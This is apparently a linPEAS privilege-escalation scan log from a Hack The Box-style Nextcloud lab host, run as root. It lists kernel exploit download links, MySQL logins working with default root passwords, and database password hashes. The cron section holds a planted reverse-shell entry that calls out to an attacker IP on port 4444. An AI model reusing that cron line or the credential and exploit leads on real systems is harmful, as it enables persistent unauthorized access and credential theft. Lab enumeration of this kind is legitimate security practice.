╔═══════════════════╗ ═══════════════════════════════╣ Basic information ╠═══════════════════════════════ ╚═══════════════════╝
OS: Linux version 5.14.0-162.22.2.el9_1.x86_64 (mockbuild@host-100-100-224-52) (gcc (GCC) 11.3.1 20220421 (Red Hat 11.3.1-2.1.0.2), GNU ld version 2.35.2-24.0.1.el9) #1 SMP PREEMPT_DYNAMIC Mon Mar 27 11:24:05 PDT 2023
User & Groups: uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
Hostname: nextcloud.contempt.htb
Writable folder: /dev/shm [+] /usr/sbin/ping is available for network discovery (linpeas can discover hosts, learn more with -h) [+] /usr/bin/bash is available for network discovery, port scanning and port forwarding (linpeas can discover hosts, scan ports, and forward ports. Learn more with -h)
╔════════════════════╗ ══════════════════════════════╣ System Information ╠══════════════════════════════ ╚════════════════════╝ ╔══════════╣ Operative system ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 5.14.0-162.22.2.el9_1.x86_64 (mockbuild@host-100-100-224-52) (gcc (GCC) 11.3.1 20220421 (Red Hat 11.3.1-2.1.0.2), GNU ld version 2.35.2-24.0.1.el9) #1 SMP PREEMPT_DYNAMIC Mon Mar 27 11:24:05 PDT 2023 lsb_release Not Found
╔══════════╣ Sudo version ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.9.5p2
╔══════════╣ Searching Signature verification failed in dmesg ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#dmesg-signature-verification-failed dmesg Not Found
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: less probable
Tags: ubuntu=20.04{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded
╔══════════╣ Executing Linux Exploit Suggester 2 ╚ https://github.com/jondonas/linux-exploit-suggester-2
╔══════════╣ Protections ═╣ AppArmor enabled? .............. AppArmor Not Found ═╣ AppArmor profile? .............. unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023═╣ is linuxONE? ................... s390x Not Found ═╣ grsecurity present? ............ grsecurity Not Found ═╣ PaX bins present? .............. PaX Not Found ═╣ Execshield enabled? ............ Execshield Not Found ═╣ SELinux enabled? ............... SELinux status: enabled
SELinuxfs mount: /sys/fs/selinux
SELinux root directory: /etc/selinux
Loaded policy name: targeted
Current mode: permissive
Mode from config file: permissive
Policy MLS status: enabled
Policy deny_unknown status: allowed
Memory protection checking: actual (secure)
Max kernel policy version: 33 ═╣ Seccomp enabled? ............... disabled ═╣ User namespace? ................ enabled ═╣ Cgroup2 enabled? ............... enabled ═╣ Is ASLR enabled? ............... Yes ═╣ Printer? ....................... No ═╣ Is this a virtual machine? ..... Yes (microsoft)
╔═══════════╗ ═══════════════════════════════════╣ Container ╠═══════════════════════════════════ ╚═══════════╝ ╔══════════╣ Container related tools present (if any): ╔══════════╣ Am I Containered? ╔══════════╣ Container details ═╣ Is this a container? ...........No ═╣ Any running containers? ........ No
╔═══════╗ ═════════════════════════════════════╣ Cloud ╠═════════════════════════════════════ ╚═══════╝ ═╣ Google Cloud Platform? ............... No ═╣ AWS ECS? ............................. No ═╣ AWS EC2? ............................. No ═╣ AWS EC2 Beanstalk? ................... No ═╣ AWS Lambda? .......................... No ═╣ AWS Codebuild? ....................... No ═╣ DO Droplet? .......................... No ═╣ IBM Cloud VM? ........................ No ═╣ Azure VM? ............................ No ═╣ Azure APP? ........................... No
╔══════════╣ Binary processes permissions (non 'root root' and not belonging to current user) ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes
╔══════════╣ Processes whose PPID belongs to a different user (not root) ╚ You will know if a user can somehow spawn processes as a different user
Proc 551 with ppid 1 is run by user dbus but the ppid user is root
Proc 556 with ppid 1 is run by user chrony but the ppid user is root
Proc 660 with ppid 1 is run by user mysql but the ppid user is root
Proc 666 with ppid 564 is run by user apache but the ppid user is root
Proc 667 with ppid 564 is run by user apache but the ppid user is root
Proc 668 with ppid 564 is run by user apache but the ppid user is root
Proc 669 with ppid 564 is run by user apache but the ppid user is root
Proc 670 with ppid 564 is run by user apache but the ppid user is root
Proc 757 with ppid 562 is run by user apache but the ppid user is root
Proc 759 with ppid 562 is run by user apache but the ppid user is root
Proc 760 with ppid 562 is run by user apache but the ppid user is root
Proc 761 with ppid 562 is run by user apache but the ppid user is root
Proc 1038 with ppid 562 is run by user apache but the ppid user is root
Proc 4079 with ppid 1 is run by user apache but the ppid user is root
╔══════════╣ Processes with credentials in memory (root req) ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#credentials-from-process-memory gdm-password Not Found gnome-keyring-daemon Not Found lightdm Not Found vsftpd Not Found apache2 Not Found sshd: process found (dump creds from memory as root)
╔══════════╣ Cron jobs ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs
/usr/bin/crontab
* * * * * /bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.79/4444 0>&1' incrontab Not Found
-rw-r--r--. 1 root root 0 Oct 31 2022 /etc/cron.deny
-rw-r--r--. 1 root root 451 May 11 2022 /etc/crontab
/etc/cron.d:
total 16
drwxr-xr-x. 2 root root 21 May 16 13:01 .
drwxr-xr-x. 88 root root 8192 Jul 18 13:35 ..
-rw-r--r--. 1 root root 128 Oct 31 2022 0hourly
╔══════════╣ System timers ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers
NEXT LEFT LAST PASSED UNIT ACTIVATES
Tue 2023-07-18 13:45:21 EDT 6min left - - dnf-makecache.timer dnf-makecache.service
Tue 2023-07-18 13:50:13 EDT 11min left - - systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
Wed 2023-07-19 00:00:00 EDT 10h left Tue 2023-07-18 06:14:37 EDT 7h ago logrotate.timer logrotate.service
╔═══════════════════╗ ═══════════════════════════════╣ Users Information ╠═══════════════════════════════ ╚═══════════════════╝ ╔══════════╣ My user ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#users
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
╔══════════╣ Do I have PGP keys?
/usr/bin/gpg netpgpkeys Not Found netpgp Not Found
╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
Matching Defaults entries for root on nextcloud:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User root may run the following commands on nextcloud:
(ALL) ALL
/etc/sudoers:Defaults !visiblepw
/etc/sudoers:Defaults always_set_home
/etc/sudoers:Defaults match_group_by_gid
/etc/sudoers:Defaults always_query_group_plugin
/etc/sudoers:Defaults env_reset
/etc/sudoers:Defaults env_keep = "COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS"
/etc/sudoers:Defaults env_keep += "MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE"
/etc/sudoers:Defaults env_keep += "LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES"
/etc/sudoers:Defaults env_keep += "LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE"
/etc/sudoers:Defaults env_keep += "LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY"
/etc/sudoers:Defaults secure_path = /sbin:/bin:/usr/sbin:/usr/bin
/etc/sudoers:rootALL=(ALL) ALL
/etc/sudoers:%wheel ALL=(ALL) ALL
╔══════════╣ Checking sudo tokens ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens
ptrace protection is disabled (0), so sudo tokens could be abused
╔══════════╣ Login now
13:39:09 up 3 min, 1 user, load average: 0.55, 0.34, 0.15
USER TTY LOGIN@ IDLE JCPU PCPU WHAT root pts/1 13:37 37.00s 0.05s 0.00s w
╔══════════╣ Last logons
reboot system boot Fri Jun 9 16:30:07 2023 - Fri Jun 9 16:34:19 2023 (00:04) 0.0.0.0 root pts/0 Fri Jun 9 16:18:54 2023 - Fri Jun 9 16:25:36 2023 (00:06) 172.16.20.1
reboot system boot Fri Jun 9 16:16:32 2023 - Fri Jun 9 16:28:06 2023 (00:11) 0.0.0.0
reboot system boot Thu May 25 14:51:29 2023 - Thu May 25 16:34:42 2023 (01:43) 0.0.0.0 root pts/0 Thu May 25 14:46:28 2023 - Thu May 25 14:47:51 2023 (00:01) 172.16.20.1 root pts/0 Thu May 25 13:47:24 2023 - Thu May 25 13:53:40 2023 (00:06) 172.16.20.1
reboot system boot Thu May 25 13:23:46 2023 - Thu May 25 14:49:54 2023 (01:26) 0.0.0.0
reboot system boot Thu May 25 08:48:23 2023 - Thu May 25 08:48:59 2023 (00:00) 0.0.0.0
wtmp begins Thu May 25 08:46:42 2023
╔══════════╣ Last time logon each user
Username Port From Latest root pts/1 172.16.20.1 Tue Jul 18 13:37:56 -0400 2023 echo.rivers pts/0 Sat Jul 15 10:23:40 -0400 2023
╔══════════╣ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I don't do it in FAST mode...)
╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!
╔══════════╣ MySQL version
mysql Ver 15.1 Distrib 10.5.16-MariaDB, for Linux (x86_64) using EditLine wrapper
═╣ MySQL connection using default root/root ........... Yes UserHostauthentication_string mariadb.syslocalhost rootlocalhost*8C0A3FBC12B2E2353C9FC2AD10587C3F56D1AA14 mysqllocalhostinvalid nextcloudlocalhost*43A3A08588FD297EFFE89D2C4F108FDFA67C6325 ═╣ MySQL connection using root/toor ................... Yes UserHostauthentication_string mariadb.syslocalhost rootlocalhost*8C0A3FBC12B2E2353C9FC2AD10587C3F56D1AA14 mysqllocalhostinvalid nextcloudlocalhost*43A3A08588FD297EFFE89D2C4F108FDFA67C6325 ═╣ MySQL connection using root/NOPASS ................. Yes UserHostauthentication_string mariadb.syslocalhost rootlocalhost*8C0A3FBC12B2E2353C9FC2AD10587C3F56D1AA14 mysqllocalhostinvalid nextcloudlocalhost*43A3A08588FD297EFFE89D2C4F108FDFA67C6325
╔══════════╣ Searching mysql credentials and exec
From '/var/lib/mysql/mysql/user.frm' Mysql user: query=select `mysql`.`global_priv`.`Host` AS `Host`,`mysql`.`global_priv`.`User` AS `User`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.plugin\') in (\'mysql_native_password\',\'mysql_old_password\'),ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.authentication_string\'),\'\'),\'\') AS `Password`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 1,\'Y\',\'N\') AS `Select_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 2,\'Y\',\'N\') AS `Insert_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 4,\'Y\',\'N\') AS `Update_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 8,\'Y\',\'N\') AS `Delete_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 16,\'Y\',\'N\') AS `Create_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 32,\'Y\',\'N\') AS `Drop_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 64,\'Y\',\'N\') AS `Reload_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 128,\'Y\',\'N\') AS `Shutdown_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 256,\'Y\',\'N\') AS `Process_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 512,\'Y\',\'N\') AS `File_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 1024,\'Y\',\'N\') AS `Grant_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 2048,\'Y\',\'N\') AS `References_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 4096,\'Y\',\'N\') AS `Index_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 8192,\'Y\',\'N\') AS `Alter_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 16384,\'Y\',\'N\') AS `Show_db_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 32768,\'Y\',\'N\') AS `Super_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 65536,\'Y\',\'N\') AS `Create_tmp_table_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 131072,\'Y\',\'N\') AS `Lock_tables_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 262144,\'Y\',\'N\') AS `Execute_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 524288,\'Y\',\'N\') AS `Repl_slave_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 1048576,\'Y\',\'N\') AS `Repl_client_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 2097152,\'Y\',\'N\') AS `Create_view_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 4194304,\'Y\',\'N\') AS `Show_view_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 8388608,\'Y\',\'N\') AS `Create_routine_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 16777216,\'Y\',\'N\') AS `Alter_routine_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 33554432,\'Y\',\'N\') AS `Create_user_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 67108864,\'Y\',\'N\') AS `Event_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 134217728,\'Y\',\'N\') AS `Trigger_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 268435456,\'Y\',\'N\') AS `Create_tablespace_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 536870912,\'Y\',\'N\') AS `Delete_history_priv`,elt(ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.ssl_type\'),0) + 1,\'\',\'ANY\',\'X509\',\'SPECIFIED\') AS `ssl_type`,ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.ssl_cipher\'),\'\') AS `ssl_cipher`,ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.x509_issuer\'),\'\') AS `x509_issuer`,ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.x509_subject\'),\'\') AS `x509_subject`,cast(ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.max_questions\'),0) as unsigned) AS `max_questions`,cast(ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.max_updates\'),0) as unsigned) AS `max_updates`,cast(ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.max_connections\'),0) as unsigned) AS `max_connections`,cast(ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.max_user_connections\'),0) as signed) AS `max_user_connections`,ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.plugin\'),\'\') AS `plugin`,ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.authentication_string\'),\'\') AS `authentication_string`,if(ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.password_last_changed\'),1) = 0,\'Y\',\'N\') AS `password_expired`,elt(ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.is_role\'),0) + 1,\'N\',\'Y\') AS `is_role`,ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.default_role\'),\'\') AS `default_role`,cast(ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.max_statement_time\'),0.0) as decimal(12,6)) AS `max_statement_time` from `mysql`.`global_priv`
definer_user=mariadb.sys
source=SELECT\n Host,\n User,\n IF(JSON_VALUE(Priv, \'$.plugin\') IN (\'mysql_native_password\', \'mysql_old_password\'), IFNULL(JSON_VALUE(Priv, \'$.authentication_string\'), \'\'), \'\') AS Password,\n IF(JSON_VALUE(Priv, \'$.access\') & 1, \'Y\', \'N\') AS Select_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 2, \'Y\', \'N\') AS Insert_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 4, \'Y\', \'N\') AS Update_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 8, \'Y\', \'N\') AS Delete_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 16, \'Y\', \'N\') AS Create_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 32, \'Y\', \'N\') AS Drop_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 64, \'Y\', \'N\') AS Reload_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 128, \'Y\', \'N\') AS Shutdown_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 256, \'Y\', \'N\') AS Process_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 512, \'Y\', \'N\') AS File_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 1024, \'Y\', \'N\') AS Grant_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 2048, \'Y\', \'N\') AS References_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 4096, \'Y\', \'N\') AS Index_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 8192, \'Y\', \'N\') AS Alter_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 16384, \'Y\', \'N\') AS Show_db_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 32768, \'Y\', \'N\') AS Super_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 65536, \'Y\', \'N\') AS Create_tmp_table_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 131072, \'Y\', \'N\') AS Lock_tables_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 262144, \'Y\', \'N\') AS Execute_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 524288, \'Y\', \'N\') AS Repl_slave_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 1048576, \'Y\', \'N\') AS Repl_client_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 2097152, \'Y\', \'N\') AS Create_view_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 4194304, \'Y\', \'N\') AS Show_view_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 8388608, \'Y\', \'N\') AS Create_routine_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 16777216, \'Y\', \'N\') AS Alter_routine_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 33554432, \'Y\', \'N\') AS Create_user_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 67108864, \'Y\', \'N\') AS Event_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 134217728, \'Y\', \'N\') AS Trigger_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 268435456, \'Y\', \'N\') AS Create_tablespace_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 536870912, \'Y\', \'N\') AS Delete_history_priv,\n ELT(IFNULL(JSON_VALUE(Priv, \'$.ssl_type\'), 0) + 1, \'\', \'ANY\',\'X509\', \'SPECIFIED\') AS ssl_type,\n IFNULL(JSON_VALUE(Priv, \'$.ssl_cipher\'), \'\') AS ssl_cipher,\n IFNULL(JSON_VALUE(Priv, \'$.x509_issuer\'), \'\') AS x509_issuer,\n IFNULL(JSON_VALUE(Priv, \'$.x509_subject\'), \'\') AS x509_subject,\n CAST(IFNULL(JSON_VALUE(Priv, \'$.max_questions\'), 0) AS UNSIGNED) AS max_questions,\n CAST(IFNULL(JSON_VALUE(Priv, \'$.max_updates\'), 0) AS UNSIGNED) AS max_updates,\n CAST(IFNULL(JSON_VALUE(Priv, \'$.max_connections\'), 0) AS UNSIGNED) AS max_connections,\n CAST(IFNULL(JSON_VALUE(Priv, \'$.max_user_connections\'), 0) AS SIGNED) AS max_user_connections,\n IFNULL(JSON_VALUE(Priv, \'$.plugin\'), \'\') AS plugin,\n IFNULL(JSON_VALUE(Priv, \'$.authentication_string\'), \'\') AS authentication_string,\n IF(IFNULL(JSON_VALUE(Priv, \'$.password_last_changed\'), 1) = 0, \'Y\', \'N\') AS password_expired,\n ELT(IFNULL(JSON_VALUE(Priv, \'$.is_role\'), 0) + 1, \'N\', \'Y\') AS is_role,\n IFNULL(JSON_VALUE(Priv, \'$.default_role\'), \'\') AS default_role,\n CAST(IFNULL(JSON_VALUE(Priv, \'$.max_statement_time\'), 0.0) AS DECIMAL(12,6)) AS max_statement_time\n FROM global_priv;
view_body_utf8=select `mysql`.`global_priv`.`Host` AS `Host`,`mysql`.`global_priv`.`User` AS `User`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.plugin\') in (\'mysql_native_password\',\'mysql_old_password\'),ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.authentication_string\'),\'\'),\'\') AS `Password`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 1,\'Y\',\'N\') AS `Select_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 2,\'Y\',\'N\') AS `Insert_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 4,\'Y\',\'N\') AS `Update_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 8,\'Y\',\'N\') AS `Delete_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 16,\'Y\',\'N\') AS `Create_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 32,\'Y\',\'N\') AS `Drop_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 64,\'Y\',\'N\') AS `Reload_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 128,\'Y\',\'N\') AS `Shutdown_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 256,\'Y\',\'N\') AS `Process_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 512,\'Y\',\'N\') AS `File_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 1024,\'Y\',\'N\') AS `Grant_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 2048,\'Y\',\'N\') AS `References_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 4096,\'Y\',\'N\') AS `Index_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 8192,\'Y\',\'N\') AS `Alter_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 16384,\'Y\',\'N\') AS `Show_db_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 32768,\'Y\',\'N\') AS `Super_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 65536,\'Y\',\'N\') AS `Create_tmp_table_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 131072,\'Y\',\'N\') AS `Lock_tables_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 262144,\'Y\',\'N\') AS `Execute_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 524288,\'Y\',\'N\') AS `Repl_slave_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 1048576,\'Y\',\'N\') AS `Repl_client_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 2097152,\'Y\',\'N\') AS `Create_view_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 4194304,\'Y\',\'N\') AS `Show_view_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 8388608,\'Y\',\'N\') AS `Create_routine_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 16777216,\'Y\',\'N\') AS `Alter_routine_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 33554432,\'Y\',\'N\') AS `Create_user_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 67108864,\'Y\',\'N\') AS `Event_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 134217728,\'Y\',\'N\') AS `Trigger_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 268435456,\'Y\',\'N\') AS `Create_tablespace_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 536870912,\'Y\',\'N\') AS `Delete_history_priv`,elt(ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.ssl_type\'),0) + 1,\'\',\'ANY\',\'X509\',\'SPECIFIED\') AS `ssl_type`,ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.ssl_cipher\'),\'\') AS `ssl_cipher`,ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.x509_issuer\'),\'\') AS `x509_issuer`,ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.x509_subject\'),\'\') AS `x509_subject`,cast(ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.max_questions\'),0) as unsigned) AS `max_questions`,cast(ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.max_updates\'),0) as unsigned) AS `max_updates`,cast(ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.max_connections\'),0) as unsigned) AS `max_connections`,cast(ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.max_user_connections\'),0) as signed) AS `max_user_connections`,ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.plugin\'),\'\') AS `plugin`,ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.authentication_string\'),\'\') AS `authentication_string`,if(ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.password_last_changed\'),1) = 0,\'Y\',\'N\') AS `password_expired`,elt(ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.is_role\'),0) + 1,\'N\',\'Y\') AS `is_role`,ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.default_role\'),\'\') AS `default_role`,cast(ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.max_statement_time\'),0.0) as decimal(12,6)) AS `max_statement_time` from `mysql`.`global_priv`
grep: (standard input): binary file matches
From '/var/lib/mysql/mysql/help_topic.MAD' Mysql user:
╔══════════╣ Analyzing Apache-Nginx Files (limit 70)
Apache version: apache2 Not Found
Server version: Apache/2.4.53 (Rocky Linux)
Server built: Mar 18 2023 00:00:00
Nginx version: nginx Not Found
══╣ PHP exec extensions
-rw-r--r--. 1 root root 62625 May 17 08:04 /etc/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
mysqli.allow_persistent = On
pgsql.allow_persistent = On
-rw-r--r--. 1 apache apache 28 Apr 19 15:38 /var/www/html/nextcloud/3rdparty/aws/aws-crt-php/php.ini
drwxr-xr-x. 4 root root 37 May 16 13:57 /etc/nginx
-rw-r--r--. 1 root root 136 Feb 28 12:36 /etc/nginx/conf.d/php-fpm.conf
upstream php-fpm {
server unix:/run/php-fpm/www.sock;
}
-rw-r--r--. 1 root root 473 Feb 28 12:36 /etc/nginx/default.d/php.conf
index index.php index.html index.htm;
location ~ \.(php|phar)(/.*)?$ {
fastcgi_split_path_info ^(.+\.(?:php|phar))(/.*)$;
fastcgi_intercept_errors on;
fastcgi_index index.php;
include fastcgi_params;
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
fastcgi_param PATH_INFO $fastcgi_path_info;
fastcgi_pass php-fpm;
}
drwxr-xr-x. 3 root root 18 May 16 13:57 /usr/share/nginx
Virtual Network Computing Server (VNC) A VNC server provides an external accessible X session. Enable this option if you plan to provide a VNC server with direct access. The access will be possible for displays :0 to :3. If you plan to provide access with SSH, do not open this option and use the via option of the VNC viewer.
╔══════════╣ Analyzing Ldap Files (limit 70)
The password hash is from the {SSHA} to 'structural'
drwx------. 2 root root 44 May 16 13:23 /var/lib/selinux/targeted/active/modules/100/ldap
-rw-r--r--. 1 root root 162 May 16 13:04 /etc/ssh/ssh_host_ecdsa_key.pub
-rw-r--r--. 1 root root 82 May 16 13:04 /etc/ssh/ssh_host_ed25519_key.pub
-rw-r--r--. 1 root root 554 May 16 13:04 /etc/ssh/ssh_host_rsa_key.pub
══╣ Possible private SSH keys were found! /etc/ssh/ssh_host_ed25519_key /etc/ssh/ssh_host_ecdsa_key /etc/ssh/ssh_host_rsa_key /var/www/html/nextcloud/3rdparty/phpseclib/phpseclib/phpseclib/Crypt/RSA.php /var/www/html/nextcloud/apps/user_saml/3rdparty/vendor/onelogin/php-saml/src/Saml2/Utils.php /var/www/html/nextcloud/apps/snappymail/app/snappymail/v/2.27.3/static/js/min/openpgp.min.js /var/www/html/nextcloud/apps/snappymail/app/snappymail/v/2.27.3/static/js/openpgp.js
══╣ Some certificates were found (out limited):
/etc/pki/ca-trust/source/ca-bundle.legacy.crt
/etc/pki/tls/certs/localhost.crt
/etc/pki/tls/certs/nextcloud.crt
